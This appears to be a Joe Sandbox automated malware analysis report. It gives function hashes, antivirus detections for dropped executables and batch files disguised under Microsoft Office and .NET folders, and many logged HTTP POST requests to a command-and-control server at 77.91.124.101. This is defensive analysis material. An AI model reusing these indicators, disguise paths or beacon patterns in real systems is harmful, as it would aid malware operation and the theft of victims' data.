Instruction Fuzzy Hash: 46212170E0C94A9FDB59FE68D5519A8B7A2FF54740B504139D01DD3682DF28B851CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8491285BB Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0366de19e84ceccd6e018c01e7248a96660fc65b998fafd7deec7110d41dc6fc
Instruction ID: 034aa3aaacee7a2ad9231c030529ee5ee54d7268fee4d9fea695a445602d28ee
Opcode Fuzzy Hash: 0366de19e84ceccd6e018c01e7248a96660fc65b998fafd7deec7110d41dc6fc
Instruction Fuzzy Hash: FE219F3084C6CC9FCBA6FF24C854AE57BB0EF56315F0801EAD40DEB1A2DA395985CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8491285BA Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61eac6bb73d453fa98b8d838128cc9e0cfff1f08a673db834ad30d14c664fb72
Instruction ID: 1a3d0f254aae921726819ee970dc4f1000e2aa827d13e42c1bff4686a7387163
Opcode Fuzzy Hash: 61eac6bb73d453fa98b8d838128cc9e0cfff1f08a673db834ad30d14c664fb72
Instruction Fuzzy Hash: 5F21913084C6CC8FCBA6FF64C854AE87BB0EF56305F0800EAD40DE71A2DA395985CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849123CD0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 198bc06ba86a7d595fd219d12f078585aa9ccff5d690098e257f84c08bfcbcbb
Instruction ID: 4cd634b0011aae2d72f4f2c3b37e0249e8f9cd6f2008f9d86b5bb2be48c8de14
Opcode Fuzzy Hash: 198bc06ba86a7d595fd219d12f078585aa9ccff5d690098e257f84c08bfcbcbb
Instruction Fuzzy Hash: DD11943191DB8A4EEBB5BF2494115F673E1EF54391F80063AD44EC35C2EE2CB8468A91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849126C68 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad6a132a2d7385c619ba843af934c29c08bfc114308c4364b50e737af51db205
Instruction ID: 4324f9ced9e040b76fc3059a59c0cbb7dd24aea431fd3567533e5840ce3901f9
Opcode Fuzzy Hash: ad6a132a2d7385c619ba843af934c29c08bfc114308c4364b50e737af51db205
Instruction Fuzzy Hash: 1711A031F0CA9A4FEBB4BE6D551417D36E1EB59380F510177D509F72C1FE6C28058A91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849123B4E Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0384b213a35f60c9238270b72e7589c6caabe1b6a9324a3f00d7036de9c3ef19
Instruction ID: 385d7b14b3b04a725928364bbf73b5d28c5910409d16e51f1184e734c28cb0f4
Opcode Fuzzy Hash: 0384b213a35f60c9238270b72e7589c6caabe1b6a9324a3f00d7036de9c3ef19
Instruction Fuzzy Hash: C4110E3560D68A8FEB29BF08D4152E433A0EF543A2F10053BE91DC32C1EA6CA8518A91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8491207A0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34b08b0d7e23cb6a5841c3fb1930768dabc241e0d52d349fa33d499c88a09e0e
Instruction ID: 9886c8740678983eda8303cc0e3e3f43c2855c1602a92ebe91575022102168ab
Opcode Fuzzy Hash: 34b08b0d7e23cb6a5841c3fb1930768dabc241e0d52d349fa33d499c88a09e0e
Instruction Fuzzy Hash: 5801C831D0C68E9FE7B47E5444046BD36B5EF55BC0F110136D00EF7191EE6C28029AA6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849126549 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b6828761a6483170611b13bb8945d3e9184284b8311a624f9c2a741b7d59bf3
Instruction ID: 172be06cee190eeb76a02ee2637d2ac600236c20893a1491e1c98f641efdcd92
Opcode Fuzzy Hash: 4b6828761a6483170611b13bb8945d3e9184284b8311a624f9c2a741b7d59bf3
Instruction Fuzzy Hash: F2F0826188E2D61FD7235B781C259E03FB4DE576A070D40EBE4849B8D3D40D458BC722

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849122362 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fdc2722124ce455d644c518d74da58405e67d257899170a4c3fa9bcbbbba9d7
Instruction ID: 585bfa344f338aecd872d146784271f0f575e91f190e7c07d2b23b6a3dbc6960
Opcode Fuzzy Hash: 9fdc2722124ce455d644c518d74da58405e67d257899170a4c3fa9bcbbbba9d7
Instruction Fuzzy Hash: F9F09631C4E2C69FD72AEF7088115E93FA4EF47254F2808F6D485DB0A2D56D2506CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF84912305B Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a95472400129c7ea2d98a020180b3b16e89c12feb1d88388ead19dbee683c3ca
Instruction ID: ca05289c054a7e022fe32c1de8a9a9ca805aa0ce38e9c857f709994e05aba29a
Opcode Fuzzy Hash: a95472400129c7ea2d98a020180b3b16e89c12feb1d88388ead19dbee683c3ca
Instruction Fuzzy Hash: 9CD0C702E0C7D79FE67A3974186417C19C09F56DC0B550276D11A962D7FD4C28065E77

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849126738 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d425dcf55f9389106d4d0b92061af91ca06e4ce56fa144da874ee8167ecd62d
Instruction ID: 1ff3c54f39cd6a0eec83f1ce9460126c325f9c2e19676d8fef7ec3bdd1f57374
Opcode Fuzzy Hash: 9d425dcf55f9389106d4d0b92061af91ca06e4ce56fa144da874ee8167ecd62d
Instruction Fuzzy Hash: 6AD0122185F7C60FDB16BB7518150987F90AF03194B8945FFD0489B0D3E49D48598B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849129DFB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea27cff136e5befd12590b4a3c2f7deb0091858bb4dacae0161e440977089687
Instruction ID: 93d88ad9d18d454341b47e91e79cfc59f18f5fe90c3d5c30246520b29b034e61
Opcode Fuzzy Hash: ea27cff136e5befd12590b4a3c2f7deb0091858bb4dacae0161e440977089687
Instruction Fuzzy Hash: 53D0CA60A0D6D38DF239BE0993202BE66A18F04780E70043EC0AF799C1ED1EB8516E12

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF849123B2B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76c3e732c25a46d756dc155dc3f2733b154266a48b784f7b6f5b68af5c9b6ed2
Instruction ID: 0f385aa64788ea0d4050c1f60a1035c67af98a8b8e39ae57b2e6680921d57700
Opcode Fuzzy Hash: 76c3e732c25a46d756dc155dc3f2733b154266a48b784f7b6f5b68af5c9b6ed2
Instruction Fuzzy Hash: 94D0C920A0C6DB8DF6387E11802027A91A0DF00F80FA0403EE19F618C1ED1CB5036E07

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF849120750 Relevance: 5.0, Strings: 4, Instructions: 19COMMON

Download Yara Rule

Strings

._^J, xrefs: 00007FF84912076A
._^L, xrefs: 00007FF849120772
._^N, xrefs: 00007FF84912077A
._^H, xrefs: 00007FF849120762

Memory Dump Source

Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd

Similarity

API ID:
String ID: ._^H$._^J$._^L$._^N
API String ID: 0-3121379274
Opcode ID: b0613fd1345414c292bf995574b5b598baf2b22be48d6e1fea826bd9b97e1eb9
Instruction ID: a587b38241eb674b017d9ad9fad2b2d1013a9cdaa9b1a5920aa62c704ce2d121
Opcode Fuzzy Hash: b0613fd1345414c292bf995574b5b598baf2b22be48d6e1fea826bd9b97e1eb9
Instruction Fuzzy Hash: 86D0C9DD8194B61ED38457B028F22FB2BC4950135CBB03A25DA66CD483D549D2C5C2E5

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\KWPomPtF.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\BnwYCmoX.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\HJnNqbKj.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\Desktop\MTqwIPIz.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\qtmQsFEO.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\pwLIWFpU.log	Avira: detection malicious, Label: HEUR/AGEN.1300079

Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe	ReversingLabs: Detection: 79%
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe	Virustotal: Detection: 69%	Perma Link
Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	ReversingLabs: Detection: 79%
Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	Virustotal: Detection: 69%	Perma Link
Source: C:\Recovery\qBJICEqiLNwXNBLrN.exe	ReversingLabs: Detection: 79%
Source: C:\Recovery\qBJICEqiLNwXNBLrN.exe	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exe	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\Desktop\BhRGcQzx.log	Virustotal: Detection: 8%	Perma Link
Source: C:\Users\user\Desktop\BnwYCmoX.log	Virustotal: Detection: 12%	Perma Link
Source: C:\Users\user\Desktop\GVjFENOl.log	Virustotal: Detection: 7%	Perma Link
Source: C:\Users\user\Desktop\GbOXfjDL.log	Virustotal: Detection: 7%	Perma Link
Source: C:\Users\user\Desktop\HJnNqbKj.log	ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\HJnNqbKj.log	Virustotal: Detection: 32%	Perma Link
Source: C:\Users\user\Desktop\KWPomPtF.log	ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\KWPomPtF.log	Virustotal: Detection: 32%	Perma Link
Source: C:\Users\user\Desktop\SoilvDeL.log	Virustotal: Detection: 8%	Perma Link

Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\fNssmckm.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\jTkAEhsC.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GbOXfjDL.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GVjFENOl.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\lGVRPIpa.log	Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	Joe Sandbox ML: detected

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Code function: 4x nop then jmp 00007FF848F4C906h		5_2_00007FF848F4C6ED
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Code function: 4x nop then jmp 00007FF848F3C906h		12_2_00007FF848F3C6ED

Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
